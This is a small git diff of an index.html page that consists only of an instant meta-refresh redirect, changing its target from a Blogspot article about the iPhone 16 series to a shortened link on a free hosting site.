--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <meta http-equiv="refresh" content="0; URL='https://newsy1010.blogspot.com/2024/03/unveiling-anticipated-iphone-16-series.html'" />
+  <meta http-equiv="refresh" content="0; URL='https://shorttee.unaux.com/gHcLs'" />
 </head>
 <body>
 </body>
